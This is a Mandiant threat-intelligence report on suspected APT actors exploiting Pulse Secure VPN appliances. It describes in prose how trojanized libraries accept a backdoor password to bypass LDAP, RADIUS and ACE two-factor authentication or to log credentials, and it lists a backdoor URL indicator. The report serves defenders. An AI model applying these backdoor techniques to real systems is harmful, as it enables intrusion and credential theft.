href="https://cloud.google.com/contact/" track-name="contact sales"track-type="blog nav"track-metadata-eventdetail="cloud.google.com/contact/"track-metadata-module="header" track-name="contact sales"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/contact/">Contact sales </a><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-CNusmb-o6Shpd " href="https://console.cloud.google.com/freetrial/" track-name="get started for free"track-type="blog nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/"track-metadata-module="header" track-name="get started for free"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/">Get started for free </a></div><div class="GKI4ub"><div class="Jhiezd"><form action="/blog/search/" class="A2C6Ob"><input class="BAhdXd" jsname="oJAbI" name="query" type="text" placeholder="Find an article..."><input type="hidden" name="language" value=en hidden><input type="hidden" name="category" value=article hidden><input type="hidden" name="paginate" value="25" hidden><input type="hidden" name="order" value="newest" hidden><input type="hidden" name="hl" value=en hidden><span class="A0lwXc" jsname="D8MWrd" aria-label="Show the search input field." role="button" jsaction="click:jUF4E"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true" width="40" height="22"><path d="M20.49 19l-5.73-5.73C15.53 12.2 16 10.91 16 9.5A6.5 6.5 0 1 0 9.5 16c1.41 0 2.7-.47 3.77-1.24L19 20.49 20.49 19zM5 9.5C5 7.01 7.01 5 9.5 5S14 7.01 14 9.5 11.99 14 9.5 14 5 11.99 5 9.5z"></path></svg></span></form></div></div></div></div></div><div class="glue-header__drawer-backdrop"></div></header><script nonce="-49Bz_4wsckd3k4vDG-wCQ">var AF_initDataKeys = ["ds:0"]; var AF_dataServiceRequests = {'ds:0' : {id:'nInjGe',request:["cloudblog","topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","en"]}}; var AF_initDataChunkQueue = []; var AF_initDataCallback; var AF_initDataInitializeCallback; if (AF_initDataInitializeCallback) {AF_initDataInitializeCallback(AF_initDataKeys, AF_initDataChunkQueue, AF_dataServiceRequests);}if (!AF_initDataCallback) {AF_initDataCallback = function(chunk) {AF_initDataChunkQueue.push(chunk);};}</script></head><body id="yDmH0d" jscontroller="pjICDe" jsaction="rcuQ6b:npT2md; click:FAbpgf; auxclick:FAbpgf" class="tQj5Y ghyPEc IqBfM ecJEib EWZcud nRhiJb-qJTHM" data-has-header="true" data-has-footer="true"><script aria-hidden="true" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.wiz_progress&&window.wiz_progress();</script><div class="VUoKZ" aria-hidden="true"><div class="TRHLAc"></div></div><c-wiz jsrenderer="zPZHOe" class="SSPGKf" jsdata="deferred-i1" data-p="%.@.&quot;cloudblog&quot;,&quot;topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day&quot;,&quot;en&quot;]" data-node-index="0;0" jsmodel="hc6Ubd" view c-wiz data-ogpc><div class="T4LgNb " jsname="a9kxte"><div jsname="qJTHM" class="kFwPee"><article class="nRhiJb-qJTHM" jsaction="rcuQ6b:npT2md" jscontroller="kxO7ab"><section class="nRhiJb-DARUcf"><div class="Wdmc0c nRhiJb-DbgRPb-wNfPc-cGMI2b"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c nRhiJb-BFbNVe-r8s4j-bMElCd dIsJJe" track-name="threat intelligence"track-type="tag">Threat Intelligence</div><div class="nRhiJb-ObfsIf"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-R6PoUb"></div><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-EehZO nRhiJb-fmcmS-oXtfBe"><h1 class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-ibL1re"><div class="Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-ibL1re"><span class="FewWi"></span>Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day</div></h1></div></div><div class="nRhiJb-fmcmS-oXtfBe dEogG">April 20, 2021</div></div></section><div class="EKklye"><div class="nRhiJb-DARUcf ZWw7T"><div class="npzWPc"><div class="dzoHJ"><div class="nRhiJb-DX2B6 nRhiJb-DX2B6-OWXEXe-h30Snd"><div class="nRhiJb-j5y3u"><ul class="nRhiJb-Qijihe phRaUe" role="list"><li class="hpHPGf"><a class="nRhiJb-ARYxNe" href="https://x.com/intent/tweet?text=Check%20Your%20Pulse:%20Suspected%20APT%20Actors%20Leverage%20Authentication%20Bypass%20Techniques%20and%20Pulse%20Secure%20Zero-Day%20@googlecloud&amp;url=https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day" track-name="x"track-type="social share"track-metadata-eventdetail="x.com/intent/tweet?text=Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day%20@googlecloud&amp;url=cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"track-metadata-module="social icons" target="_blank" rel="noopener"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-DX2B6 nRhiJb-Bz112c-OWXEXe-nSuQf" viewBox="0 0 24 24" role="presentation" aria-hidden="true" role="presentation" aria-hidden="true"><path d="M13.9,10.5L21.1,2h-1.7l-6.3,7.4L8,2H2.2l7.6,11.1L2.2,22h1.7l6.7-7.8L16,22h5.8L13.9,10.5L13.9,10.5z M11.5,13.2l-0.8-1.1 L4.6,3.3h2.7l5,7.1l0.8,1.1l6.5,9.2h-2.7L11.5,13.2L11.5,13.2z"></path></svg></a></li><li class="hpHPGf"><a class="nRhiJb-ARYxNe" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day&amp;title=Check%20Your%20Pulse:%20Suspected%20APT%20Actors%20Leverage%20Authentication%20Bypass%20Techniques%20and%20Pulse%20Secure%20Zero-Day" track-name="linkedin"track-type="social share"track-metadata-eventdetail="www.linkedin.com/shareArticle?mini=true&amp;url=cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day&amp;title=Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day"track-metadata-module="social icons" target="_blank" rel="noopener"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-DX2B6 nRhiJb-Bz112c-OWXEXe-nSuQf" viewBox="0 0 24 24" role="presentation" aria-hidden="true" role="presentation" aria-hidden="true"><path d="M20 2H4c-1.1 0-1.99.9-1.99 2L2 20c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zM8 19H5v-9h3v9zM6.5 8.31c-1 0-1.81-.81-1.81-1.81S5.5 4.69 6.5 4.69s1.81.81 1.81 1.81S7.5 8.31 6.5 8.31zM19 19h-3v-5.3c0-.83-.67-1.5-1.5-1.5s-1.5.67-1.5 1.5V19h-3v-9h3v1.2c.52-.84 1.59-1.4 2.5-1.4 1.93 0 3.5 1.57 3.5 3.5V19z"></path></svg></a></li><li class="hpHPGf"><a class="nRhiJb-ARYxNe" href="https://www.facebook.com/sharer/sharer.php?caption=Check%20Your%20Pulse:%20Suspected%20APT%20Actors%20Leverage%20Authentication%20Bypass%20Techniques%20and%20Pulse%20Secure%20Zero-Day&amp;u=https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day" track-name="facebook"track-type="social share"track-metadata-eventdetail="www.facebook.com/sharer/sharer.php?caption=Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day&amp;u=cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"track-metadata-module="social icons" target="_blank" rel="noopener"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-DX2B6 nRhiJb-Bz112c-OWXEXe-nSuQf" viewBox="0 0 24 24" role="presentation" aria-hidden="true" role="presentation" aria-hidden="true"><path d="M20 2H4c-1.1 0-1.99.9-1.99 2L2 20c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zm-1 2v3h-2c-.55 0-1 .45-1 1v2h3v3h-3v7h-3v-7h-2v-3h2V7.5C13 5.57 14.57 4 16.5 4H19z"></path></svg></a></li><li class="hpHPGf"><a class="nRhiJb-ARYxNe" href="mailto:?subject=Check%20Your%20Pulse:%20Suspected%20APT%20Actors%20Leverage%20Authentication%20Bypass%20Techniques%20and%20Pulse%20Secure%20Zero-Day&amp;body=Check%20out%20this%20article%20on%20the%20Cloud%20Blog:%0A%0ACheck%20Your%20Pulse:%20Suspected%20APT%20Actors%20Leverage%20Authentication%20Bypass%20Techniques%20and%20Pulse%20Secure%20Zero-Day%0A%0AWe%20examine%20multiple%20techniques%20for%20bypassing%20single%20&amp;%20multifactor%20authentication%20on%20Pulse%20Secure%20VPN%20devices%20and%20maintaining%20access%20through%20webshells.%0A%0Ahttps://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day" track-name="email"track-type="social share"track-metadata-eventdetail="mailto:?subject=Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day&amp;body=Check%20out%20this%20article%20on%20the%20Cloud%20Blog:%0A%0ACheck Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day%0A%0AWe examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells.%0A%0Acloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"track-metadata-module="social icons" target="_blank" rel="noopener"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-DX2B6 nRhiJb-Bz112c-OWXEXe-nSuQf" viewBox="0 0 24 24" role="presentation" aria-hidden="true" role="presentation" aria-hidden="true"><path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm-.8 2L12 10.8 4.8 6h14.4zM4 18V7.87l8 5.33 8-5.33V18H4z"></path></svg></a></li></ul></div></div></div></div></div><div><section class="nRhiJb-DARUcf"><div class="nRhiJb-DbgRPb-wNfPc-ma6Yeb nRhiJb-DbgRPb-wNfPc-cGMI2b"><section class="DA9Qj nRhiJb-ObfsIf nRhiJb-fmcmS-oXtfBe"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-c5RTEf"></div><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-qWD73c"><h5 class="cHE8Ub Qwf2Db-MnozTc Qwf2Db-MnozTc-OWXEXe-MnozTc-qWD73c">Mandiant </h5><p class="nRhiJb-qJTHM khCp7b"></p></div></section></div></section><div class="nRhiJb-DARUcf"><div class="nRhiJb-ObfsIf nRhiJb-DbgRPb-wNfPc-ma6Yeb nRhiJb-DbgRPb-qWD73c-cGMI2b"><div class="nRhiJb-kR0ZEf-OWXEXe-GV1x9e-ibL1re dzoHJ"></div><div class="OYL9D nRhiJb-kR0ZEf-OWXEXe-GV1x9e-OiUrBf" jsname="tx2NYc"><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Written by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels</p> <hr></span></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Executive Summary</h4> <ul> <li>Mandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.</li> <li>This blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse Secure VPN devices, persisting across upgrades, and maintaining access through webshells.</li> <li>The investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/" rel="noopener" target="_blank">CVE-2021-22893</a>, are responsible for the initial infection vector.</li> <li>Pulse Secure’s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware families and the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">Pulse Connect Secure Integrity Tool</a> for their customers to determine if their systems are impacted. A final patch to address the vulnerability will be available in early May 2021.</li> <li>Pulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues.</li> <li>There is no indication the identified backdoors were introduced through a supply chain compromise of the company’s network or software deployment process.</li> </ul> <h4>Introduction</h4> <p>Mandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These families are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily related to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for the creation and deployment of these various code families.</p> <p>The focus of this report is on the activities of UNC2630 against U.S. Defense Industrial base (DIB) networks, but detailed malware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in the technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances. Analysis is ongoing to determine the extent of the activity.</p> <p>Mandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC), and relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and mitigations for affected Pulse Secure VPN appliance owners.</p> <p>As part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well as the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">Pulse Connect Secure Integrity Tool</a> to assist with determining if systems have been impacted.</p> <h4>Details</h4> <p>Early this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the world. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse Secure VPN appliances in the affected environment.</p> <p>In many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However, based on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure vulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/" rel="noopener" target="_blank">CVE-2021-22893</a>.</p> <p>We observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance. This was done to accomplish the following:</p> <ol> <li>Trojanize shared objects with malicious code to log credentials and bypass authentication flows, including multifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.</li> <li>Inject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse Secure VPN appliance administrative web pages for the devices.</li> <li>Toggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.</li> <li>Maintain persistence across VPN appliance general upgrades that are performed by the administrator.</li> <li>Unpatch modified files and delete utilities and scripts after use to evade detection.</li> <li>Clear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.</li> </ol> <p>In a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a European organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We believe that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this.</p> <p>Due to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding, we included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.</p> <h4>SLOWPULSE</h4> <p>During our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE. This malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered variants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section, refer to the Technical Annex for more details.</p> <h5>SLOWPULSE Variant 1</h5> <p>This variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is provided by the attacker. The sample inspects login credentials used at the start of each protocol’s associated routine and strategically forces execution down the successful authentication patch if the provided password matches the attacker's chosen backdoor password.</p> <p><em>LDAP Auth Bypass</em></p> <p>The routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. This variant inserts a check against the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 1: LDAP Auth Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p><em>RADIUS Two Factor Auth Bypass</em></p> <p>The routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This variant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the authentication server. If the backdoor password is provided by the attacker, the packet type and successful authentication status flags are overwritten to spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 2: Radius-2FA Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 2</h5> <p><em>ACE Two Factor Auth Credential Logging</em></p> <p>This variant logs credentials used during the ACE-2FA authentication procedure DSAuth::AceAuthServer::checkUsernamePassword. Rather than bypassing authentication, this variant logs the username and password to a file for later use by the attacker.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 3: ACE Auth Credential Log</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 3</h5> <p><em>ACE Two Factor Auth Bypass</em></p> <p>This variant is responsible for bypassing the ACE-2FA logon procedure starting with DSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the routine responsible for verifying the username and password if the backdoor password is provided. With this modification the attacker can spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 4: ACE Auth Bypass Variant</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 4</h5> <p><em>RealmSignin Two Factor Auth Bypass</em></p> <p>This variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies the execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a two-factor authentication bypass.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 5: RealmSignIn 2FA Auth Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Attribution</h4> <p>We are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our understanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are proactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected appliances.</p> <p>Mandiant is able to assess that:</p> <ul> <li>UNC2630 targeted U.S. DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021. <ul> <li>We suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5</li> </ul> </li> <li>UNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE, QUIETPULSE, AND PULSEJUMP. <ul> <li>We do not have enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group.</li> </ul> </li> <li>We do not have enough information about the use of LOCKPICK to make an attribution statement.</li> </ul> <h5>UNC2630</h5> <p>UNC2630’s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government. Analysis is still ongoing to determine the full scope of the activity that maybe related to the group.</p> <p>Although we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party has uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor APT5. While we cannot make the same connections, the third party assessment is consistent with our understanding of APT5 and their historic TTPs and targets.</p> <p>APT5 has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances. They have also consistently targeted defense and technology companies in the U.S., Europe, and Asia.</p> <ul> <li>As early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in the embedded operating system of another technology platform.</li> <li>In 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private and government entities. During this intrusion, the actors downloaded and modified some of the router images related to the company’s network routers.</li> <li>Also during this time, APT5 stole files related to military technology from a South Asian defense organization. Observed filenames suggest the actors were interested in product specifications, emails concerning technical products, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).</li> <li>APT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.</li> </ul> <h4>Recommendations</h4> <p>All Pulse Secure Connect customers should assess the impact of the Pulse Secure mitigations and apply it if possible. Organizations should utilize the most recent version of Pulse Secure’s Integrity Assurance utility <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">released</a> on March 31, 2021. If a device fails this Integrity Assurance utility, network administrators should follow the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">instructions here</a> and contact their Pulse CSR for additional guidance.</p> <p>Organizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti highly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service accounts can be used to authenticate to the vulnerability.</p> <p>Additional detections, mitigations and relevant MITRE ATT&amp;CK techniques are included in the Technical Annex. Sample hashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. Yara rules, Snort rules, and hashes are published on <a href="https://github.com/mandiant/pulsesecure_exploitation_countermeasures/" rel="noopener" target="_blank">Mandiant’s GitHub page</a>.</p> <h4>Detections and Mitigations</h4> <p>1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc</p> <ul> <li>HARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token= that may be accessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not present in legitimate versions of this file.</li> </ul> 